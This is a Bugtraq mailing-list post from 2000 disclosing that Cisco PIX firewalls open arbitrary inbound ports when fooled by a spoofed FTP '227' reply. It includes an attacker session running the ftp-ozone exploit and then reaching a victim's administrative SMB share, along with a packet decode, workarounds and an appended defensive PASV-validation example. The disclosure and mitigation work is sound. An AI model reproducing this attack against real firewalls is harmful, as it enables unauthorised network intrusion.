Bugtraq mailing list archives
Verified PIX vulnerability to FTP-Pasv attack.
From: monti () USHOST COM (monti)
Date: Sun, 19 Mar 2000 15:07:44 -0600
Greetings,
I sent this to Cisco about 2 weeks ago, and have received a few responses.
Apparently a fix is in the works, and may already have been released by
this time unbeknownst to me (although I looked for it and have not found
it yet). In any case, I thought it would be valuable to eventually post
this so that sysadmins had a little more information about how PIX is
affected along with a few possible workarounds. The problem is definitely
very serious, and there are major differences in the way the PIX is
affected compared with Firewall-1.
Note: This analysis relates solely to the 'server' attack, not the
'client' variation of the attack that Mikael Olsson and Dug Song have
discussed most recently. Mikael's initial posting about the Firewall-1
ftp-pasv vulnerability did prompt me to look into the PIX further though.
As has been already publicized, outbound connections from clients are also
subject to manipulation.
Please see the credits in the attached message.
Eric Monti
Denmac Systems
ericm () denmac com
monti () ushost com
847.291.7760
Summary:
--------
I confirmed and did some more research regarding the PIX hole mentioned by
Jacek Lipkowski on bugtraq entitled:
Re: Addendum to Firewall-1 FTP Server Vulnerability
It is unknown whether Cisco has been made aware of this vulnerability, and
as such I am forwarding my findings.
I was able to verify that PIX is vulnerable to the FTP-Pasv vulnerability
that has been discussed on the Bugtraq mailing list as of late. Here are my
notes and findings. In a nutshell the PIX can be fooled into opening up
ports for inbound connections to a DMZ FTP server if the FTP server can be
fooled into sending back what looks like a valid "227 (xxx,xxx,xxx,xxx,prt,prt)"
response. The problem on the PIX is that the 'fixup protocol ftp' component
does not provide sufficient checks to verify PASV connections before
creating a dynamic hole through the firewall. Note that there are several ways
to get the FTP server to generate the message that will trigger PIX's insecure
behaviour. Please see the 'Relevant Links' section for more on this.
The exploit used for testing was Dug Song's ftp-ozone.c which was posted to
bugtraq.
The PIX tested is running the 4.4(4) version of software. Other versions have
not been tested but are most likely vulnerable.
Exploit notes:
--------------
Here is the session from the attacker. "ftp-ozone" is the public exploit from
Dug Song. I made a few minor 'aesthetic' adjustments and added support for
anonymous login with '-l' (although it wasn't used in this example). The source
code is attached.
-snip-
--------------Exploit Launched-----------------
[root@ix ftp-atk]# ./ftp-ozone 10.1.2.3 139
220 victim Microsoft FTP Service (Version 4.0).
Garbage packet contains:
500
'...........................................................................................................................
Money packet contains:
227 (10,1,2,3,0,139)': command not understood
-------------Opened port connected (NBT)-------
[root@ix ftp-atk]# smbclient \\\\VICTIM\\c$ -I 10.1.2.3 -U administrator
Added interface ip=127.0.0.1 bcast=127.255.255.255 nmask=255.0.0.0
Password: ********
Domain=[VICTIM] OS=[Windows NT 4.0] Server=[NT LAN Manager 4.0]
smb: \> dir
AUTOEXEC.BAT A 0 Mon Mar 13 03:22:58 2000
boot.ini ASR 279 Mon Mar 13 03:15:07 2000
CONFIG.SYS A 0 Mon Mar 13 03:22:58 2000
IO.SYS AHSR 0 Mon Mar 13 03:22:58 2000
MSDOS.SYS AHSR 0 Mon Mar 13 03:22:58 2000
MSSCE D 0 Tue Mar 7 14:29:57 2000
NTDETECT.COM AHSR 26816 Tue Mar 7 11:47:49 2000
ntldr AHSR 156496 Tue Mar 7 11:47:49 2000
pagefile.sys A1073741824 Tue Mar 7 11:51:51 2000
Program Files D 0 Tue Mar 7 11:35:11 2000
RECYCLER DHS 0 Mon Mar 13 09:35:51 2000
TEMP DA 0 Tue Mar 7 14:36:31 2000
WINNT D 0 Tue Mar 7 14:30:05 2000
64706 blocks of size 65536. 43841 blocks available
smb: \> quit
-snip--
As you can see above, after the manipulated packet generated from the FTP
server by ftp-ozone is returned, we are able to connect to the NBT(tcp/139)
service and access a share.
On the PIX with 'logging console debug' set, this was all that showed up:
302001: Built inbound TCP connection 202 for faddr 10.1.2.4/1139 gaddr 10.1.2.3/21 laddr 192.168.205.2/21
I have attached a packet decode generated from tcpdump -w. The IPs used
are as follows: attacker=10.1.2.4, victim-nat=10.1.2.3,
victim-real=192.168.205.2 (doesn't appear in decode)
The PIX sits between 10.1.2.4 and 192.168.2.2 (obviously).
In Packet #11 of the decode, in the TCP data segment, you can see what is
triggering the PIX's insecure behavior:
"227 (10,1,2,3,0,139)': command not understood."
This confirms what was assumed; that the only check that the PIX makes
before creating a dynamic PASV conduit is whether the
"227 (xxx,xxx,xxx,xxx,prt,prt)" appears at the beginning of the
packet.
Synopsis/Workarounds:
---------------------
Essentially this is the same as the more widely publicized
Firewall-1 incarnation of the hole (without their patch), only there are a
few major differences to note:
1. The port opened will allow bi-directional traffic (confirmed in
PIX 4.4(4), probably others as well).
2. *ANY* port can be opened, even low-numbered and well-known ports. This
could be worked around with a conduit ACL using explicit denies on the
external interface.
3. The 'fixup protocol ftp' is what appears to be the core of this problem
on the PIX side of it. If it is disabled the exploit (in any
version) will not work. This is what handles PASV FTP on the PIX.
If you disable it though, there are two things to note:
Outbound ftp connections from the inside *have* to be made with PASV
ftp clients.
Inbound ftp connections from the outside world cannot use PASV.
There may be other workarounds than those cited above. Any comments/suggestions
are welcome!
Relevant Links:
---------------
Vulnerability description/workarounds for Firewall-1 incarnation of the bug:
http://www.securityfocus.com/vdb/bottom.html?vid=979
Link to bugtraq mailing list archive discussing vulnerability and Checkpoint
workaround (please note comments about the problems with the Checkpoint patch
and some of the things to watch out for in implementing a fix):
http://www.securityfocus.com/templates/archive.pike?list=1&date=2000-02-8&thread=Pine.LNX.4.21.0002142201030.4674-100000 () ns ldc ro
Link to Checkpoint's patch:
http://www.checkpoint.com/techsupport/alerts/pasvftp.html
Credits:
--------
I did not find this hole (initially).
It was discovered officially and publicized by several other people.
Much thanks goes to these folks!
Jacek Lipkowski
sq5bpf () ACID CH PW EDU PL
For originally verifying PIX's vulnerability based on Firewall-1 discussions.
Mikael Olsson
mikael.olsson () enternet se
For original bugtraq postings, insights regarding this issue, and Firewall-1
confirmation.
Dataprotect:
John McDonald <jm () dataprotect com>
Thomas Lopatic <tl () dataprotect com>
For their verification of the vulnerability on Checkpoint Firewall-1.
Dug Song:
dugsong () monkey org
For original public exploit code.
Please see www.securityfocus.com bugtraq archive for all relevant posts.
I am copying all of the above people, and will be waiting for 10 days for a
response from Cisco regarding this hole before releasing any more information
publicly. If need be, I can wait longer if a fix is in the works, although
the existence of the bug has already been made public. I cannot control
whether this will be forwarded to other parties by the other people CC'd
so I leave that to their discretion.
Thanks,
Eric Monti
Denmac Systems
ericm () denmac com
847.291.7760
Packet 1
Timestamp: 15:02:37.130283
Source Ethernet Address: 00:50:04:28:FE:EB
Destination Ethernet Address: 00:D0:B7:0E:18:AB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 60 bytes
Identification: 0x04CF
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 64
Encapsulated Protocol: TCP
Header Checksum: 0x1D4C
Source IP Address: 10.1.2.4
Destination IP Address: 10.1.2.3
TCP Header
Source Port: 1139 (<unknown>)
Destination Port: 21 (ftp)
Sequence Number: 1818403974
Acknowledgement Number: 0000000000
Header Length: 40 bytes (data=0)
Flags: URG=off, ACK=off, PSH=off
RST=off, SYN=on, FIN=off
Window Advertisement: 128 bytes
Checksum: 0x78CB
Urgent Pointer: 0
<Options not displayed>
TCP Data
<No data>
-----------------------------------------------------------------
Packet 2
Timestamp: 15:02:37.130720
Source Ethernet Address: 00:D0:B7:0E:18:AB
Destination Ethernet Address: 00:50:04:28:FE:EB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 44 bytes
Identification: 0x4311
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 128
Encapsulated Protocol: TCP
Header Checksum: 0x9F19
Source IP Address: 10.1.2.3
Destination IP Address: 10.1.2.4
TCP Header
Source Port: 21 (ftp)
Destination Port: 1139 (<unknown>)
Sequence Number: 1212576390
Acknowledgement Number: 1818403975
Header Length: 24 bytes (data=0)
Flags: URG=off, ACK=on, PSH=off
RST=off, SYN=on, FIN=off
Window Advertisement: 8760 bytes
Checksum: 0x8CFE
Urgent Pointer: 0
<Options not displayed>
TCP Data
<No data>
-----------------------------------------------------------------
Packet 3
Timestamp: 15:02:37.130765
Source Ethernet Address: 00:50:04:28:FE:EB
Destination Ethernet Address: 00:D0:B7:0E:18:AB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 40 bytes
Identification: 0x04D0
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 64
Encapsulated Protocol: TCP
Header Checksum: 0x1D5F
Source IP Address: 10.1.2.4
Destination IP Address: 10.1.2.3
TCP Header
Source Port: 1139 (<unknown>)
Destination Port: 21 (ftp)
Sequence Number: 1818403975
Acknowledgement Number: 1212576391
Header Length: 20 bytes (data=0)
Flags: URG=off, ACK=on, PSH=off
RST=off, SYN=off, FIN=off
Window Advertisement: 128 bytes
Checksum: 0xC673
Urgent Pointer: 0
TCP Data
<No data>
-----------------------------------------------------------------
Packet 4
Timestamp: 15:02:37.131178
Source Ethernet Address: 00:D0:B7:0E:18:AB
Destination Ethernet Address: 00:50:04:28:FE:EB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 88 bytes
Identification: 0x4411
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 128
Encapsulated Protocol: TCP
Header Checksum: 0x9DED
Source IP Address: 10.1.2.3
Destination IP Address: 10.1.2.4
TCP Header
Source Port: 21 (ftp)
Destination Port: 1139 (<unknown>)
Sequence Number: 1212576391
Acknowledgement Number: 1818403975
Header Length: 20 bytes (data=48)
Flags: URG=off, ACK=on, PSH=on
RST=off, SYN=off, FIN=off
Window Advertisement: 8760 bytes
Checksum: 0x0458
Urgent Pointer: 0
TCP Data
220 wapp2 Microsoft FTP Service (Version 4.0)..
-----------------------------------------------------------------
Packet 5
Timestamp: 15:02:37.131204
Source Ethernet Address: 00:50:04:28:FE:EB
Destination Ethernet Address: 00:D0:B7:0E:18:AB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 40 bytes
Identification: 0x04D1
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 64
Encapsulated Protocol: TCP
Header Checksum: 0x1D5E
Source IP Address: 10.1.2.4
Destination IP Address: 10.1.2.3
TCP Header
Source Port: 1139 (<unknown>)
Destination Port: 21 (ftp)
Sequence Number: 1818403975
Acknowledgement Number: 1212576439
Header Length: 20 bytes (data=0)
Flags: URG=off, ACK=on, PSH=off
RST=off, SYN=off, FIN=off
Window Advertisement: 80 bytes
Checksum: 0xC673
Urgent Pointer: 0
TCP Data
<No data>
-----------------------------------------------------------------
Packet 6
Timestamp: 15:02:47.126818
Source Ethernet Address: 00:50:04:28:FE:EB
Destination Ethernet Address: 00:D0:B7:0E:18:AB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 163 bytes
Identification: 0x04D2
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 64
Encapsulated Protocol: TCP
Header Checksum: 0x1CE2
Source IP Address: 10.1.2.4
Destination IP Address: 10.1.2.3
TCP Header
Source Port: 1139 (<unknown>)
Destination Port: 21 (ftp)
Sequence Number: 1818403975
Acknowledgement Number: 1212576439
Header Length: 20 bytes (data=123)
Flags: URG=off, ACK=on, PSH=on
RST=off, SYN=off, FIN=off
Window Advertisement: 128 bytes
Checksum: 0x96BF
Urgent Pointer: 0
TCP Data
...........................................................................................................................
-----------------------------------------------------------------
Packet 7
Timestamp: 15:02:47.248131
Source Ethernet Address: 00:D0:B7:0E:18:AB
Destination Ethernet Address: 00:50:04:28:FE:EB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 40 bytes
Identification: 0x4511
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 128
Encapsulated Protocol: TCP
Header Checksum: 0x9D1D
Source IP Address: 10.1.2.3
Destination IP Address: 10.1.2.4
TCP Header
Source Port: 21 (ftp)
Destination Port: 1139 (<unknown>)
Sequence Number: 1212576439
Acknowledgement Number: 1818404098
Header Length: 20 bytes (data=0)
Flags: URG=off, ACK=on, PSH=off
RST=off, SYN=off, FIN=off
Window Advertisement: 8637 bytes
Checksum: 0xA48B
Urgent Pointer: 0
TCP Data
<No data>
-----------------------------------------------------------------
Packet 8
Timestamp: 15:02:47.248184
Source Ethernet Address: 00:50:04:28:FE:EB
Destination Ethernet Address: 00:D0:B7:0E:18:AB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 69 bytes
Identification: 0x04D3
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 64
Encapsulated Protocol: TCP
Header Checksum: 0x1D3F
Source IP Address: 10.1.2.4
Destination IP Address: 10.1.2.3
TCP Header
Source Port: 1139 (<unknown>)
Destination Port: 21 (ftp)
Sequence Number: 1818404098
Acknowledgement Number: 1212576439
Header Length: 20 bytes (data=29)
Flags: URG=off, ACK=on, PSH=on
RST=off, SYN=off, FIN=off
Window Advertisement: 128 bytes
Checksum: 0x2602
Urgent Pointer: 0
TCP Data
227 (10,1,2,3,0,139).
-----------------------------------------------------------------
Packet 9
Timestamp: 15:02:47.248558
Source Ethernet Address: 00:D0:B7:0E:18:AB
Destination Ethernet Address: 00:50:04:28:FE:EB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 168 bytes
Identification: 0x4611
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 128
Encapsulated Protocol: TCP
Header Checksum: 0x9B9D
Source IP Address: 10.1.2.3
Destination IP Address: 10.1.2.4
TCP Header
Source Port: 21 (ftp)
Destination Port: 1139 (<unknown>)
Sequence Number: 1212576439
Acknowledgement Number: 1818404127
Header Length: 20 bytes (data=128)
Flags: URG=off, ACK=on, PSH=off
RST=off, SYN=off, FIN=off
Window Advertisement: 8608 bytes
Checksum: 0x168C
Urgent Pointer: 0
TCP Data
500
'...........................................................................................................................
-----------------------------------------------------------------
Packet 10
Timestamp: 15:02:47.248599
Source Ethernet Address: 00:50:04:28:FE:EB
Destination Ethernet Address: 00:D0:B7:0E:18:AB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 40 bytes
Identification: 0x04D4
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 64
Encapsulated Protocol: TCP
Header Checksum: 0x1D5B
Source IP Address: 10.1.2.4
Destination IP Address: 10.1.2.3
TCP Header
Source Port: 1139 (<unknown>)
Destination Port: 21 (ftp)
Sequence Number: 1818404127
Acknowledgement Number: 1212576567
Header Length: 20 bytes (data=0)
Flags: URG=off, ACK=on, PSH=off
RST=off, SYN=off, FIN=off
Window Advertisement: 128 bytes
Checksum: 0xC52B
Urgent Pointer: 0
TCP Data
<No data>
-----------------------------------------------------------------
Packet 11
Timestamp: 15:02:47.248836
Source Ethernet Address: 00:D0:B7:0E:18:AB
Destination Ethernet Address: 00:50:04:28:FE:EB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 94 bytes
Identification: 0x4711
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 128
Encapsulated Protocol: TCP
Header Checksum: 0x9AE7
Source IP Address: 10.1.2.3
Destination IP Address: 10.1.2.4
TCP Header
Source Port: 21 (ftp)
Destination Port: 1139 (<unknown>)
Sequence Number: 1212576567
Acknowledgement Number: 1818404127
Header Length: 20 bytes (data=54)
Flags: URG=off, ACK=on, PSH=on
RST=off, SYN=off, FIN=off
Window Advertisement: 8608 bytes
Checksum: 0x1DD1
Urgent Pointer: 0
TCP Data
227 (10,1,2,3,0,139)': command not understood.
-----------------------------------------------------------------
Packet 12
Timestamp: 15:02:47.266742
Source Ethernet Address: 00:50:04:28:FE:EB
Destination Ethernet Address: 00:D0:B7:0E:18:AB
Encapsulated Protocol: IP
IP Header
Version: 4
Header Length: 20 bytes
Service Type: 0x00
Datagram Length: 40 bytes
Identification: 0x04D5
Flags: MF=off, DF=on
Fragment Offset: 0
TTL: 64
Encapsulated Protocol: TCP
Header Checksum: 0x1D5A
Source IP Address: 10.1.2.4
Destination IP Address: 10.1.2.3
TCP Header
Source Port: 1139 (<unknown>)
Destination Port: 21 (ftp)
Sequence Number: 1818404127
Acknowledgement Number: 1212576621
Header Length: 20 bytes (data=0)
Flags: URG=off, ACK=on, PSH=off
RST=off, SYN=off, FIN=off
Window Advertisement: 128 bytes
Checksum: 0xC4F5
Urgent Pointer: 0
TCP Data
<No data>
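The body of the post explains that the fixup only looked for "227 (...)" at the beginning of a packet, and packets 9 and 11 of the decode show why that is not enough: the server's single "500 '...': command not understood." reply was split across two TCP segments, and the second segment happened to begin with the PASV-shaped text. The following is an added Python example, not part of Eric Monti's message, the ftp-ozone exploit, or Cisco's fixup code. It models the checks a firewall's FTP inspection should make before opening a dynamic data-channel hole: reassemble the server stream and evaluate only complete reply lines, honour a 227 only in answer to a client PASV, require the address to be the server's own, and apply a port policy. The PasvInspector class, the port-1024 floor, the deny set (standing in for the explicit-deny conduit ACL workaround), and the filler bytes replacing the dots in the decode are all assumptions of this example.

```python
"""Stateful FTP PASV (227) reply validation for a firewall's FTP inspection.

Added example for this archive page; it is not Eric Monti's code, the
ftp-ozone exploit, or Cisco's fixup implementation. It demonstrates the
checks the post says the PIX did not make.
"""
import re
from typing import List, Optional, Set, Tuple

# RFC 959 PASV reply: "227 <text> (h1,h2,h3,h4,p1,p2)" at the start of a line.
_PASV_RE = re.compile(
    r"^227 [^\r\n]*?\((\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})\)"
)


class PasvInspector:
    """Tracks one FTP control connection and records data-channel endpoints
    that may be opened dynamically (hypothetical inspector, not a PIX API)."""

    def __init__(self, server_ip: str, denied_ports: Optional[Set[int]] = None):
        self.server_ip = server_ip
        # Stand-in for the explicit-deny conduit ACL workaround in the post.
        self.denied_ports = denied_ports or set()
        self._buf = b""             # unconsumed bytes of the server's current line
        self._pasv_pending = False  # did the client's last command ask for PASV?
        self.opened: List[Tuple[str, int]] = []
        self.rejected: List[str] = []

    def client_sent(self, segment: bytes) -> None:
        """Client->server payload: remember whether a PASV command was issued."""
        for line in segment.split(b"\r\n"):
            if line:
                self._pasv_pending = line.strip().upper() == b"PASV"

    def server_sent(self, segment: bytes) -> List[Tuple[str, int]]:
        """Server->client payload: returns endpoints opened by this segment.

        Segments are reassembled and only complete lines are evaluated, so a
        '227 (...)' that merely starts a TCP segment in the middle of another
        reply (as in packets 9 and 11 of the decode) never matches.
        """
        before = len(self.opened)
        self._buf += segment
        while b"\n" in self._buf:
            line, _, self._buf = self._buf.partition(b"\n")
            self._check_reply(line.rstrip(b"\r").decode("latin-1"))
        return self.opened[before:]

    def _check_reply(self, line: str) -> None:
        m = _PASV_RE.match(line)
        if m is None:
            return
        if not self._pasv_pending:
            self.rejected.append("227 without a preceding PASV: " + line)
            return
        self._pasv_pending = False
        octets = [int(x) for x in m.groups()[:4]]
        p1, p2 = int(m.group(5)), int(m.group(6))
        if any(o > 255 for o in octets) or p1 > 255 or p2 > 255:
            self.rejected.append("malformed host/port tuple: " + line)
            return
        ip = ".".join(map(str, octets))
        port = p1 * 256 + p2
        if ip != self.server_ip:
            self.rejected.append(f"address {ip} is not the server {self.server_ip}")
            return
        # Policy choice of this example: never open privileged or denied ports.
        if port < 1024 or port in self.denied_ports:
            self.rejected.append(f"port {port} not permitted for a data channel")
            return
        self.opened.append((ip, port))


def replay_decode_packets_9_and_11() -> Tuple[List[Tuple[str, int]], List[str]]:
    """Constructed replay of the post's capture: the server's one '500' reply
    is split so that the second TCP segment begins with '227 (10,1,2,3,0,139)'.
    The 'A' bytes are stand-ins for the dots shown in the decode."""
    insp = PasvInspector("10.1.2.3")
    insp.client_sent(b"A" * 123)                         # packet 6: not a PASV
    insp.server_sent(b"500 '" + b"A" * 120)              # packet 9 (constructed)
    insp.server_sent(b"227 (10,1,2,3,0,139)': command not understood.\r\n")  # packet 11
    return insp.opened, insp.rejected


def legitimate_pasv() -> List[Tuple[str, int]]:
    """A genuine PASV exchange; the reply names the server and port 4*256+1."""
    insp = PasvInspector("10.1.2.3")
    insp.client_sent(b"PASV\r\n")
    return insp.server_sent(b"227 Entering Passive Mode (10,1,2,3,4,1).\r\n")


if __name__ == "__main__":
    print("attack replay  :", replay_decode_packets_9_and_11())
    print("legitimate PASV:", legitimate_pasv())
```

The replay opens nothing, and it does so without any policy check firing: once the two segments are reassembled, the "227" sits in the middle of a "500" line, so it is never parsed as a reply at all. The remaining checks matter for the other ways the post mentions of getting a server to emit such text; the address check stops a 227 from redirecting a hole to some other host behind the firewall, and the port floor plus deny set is the same idea as the explicit-deny conduit ACL suggested in workaround 2.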
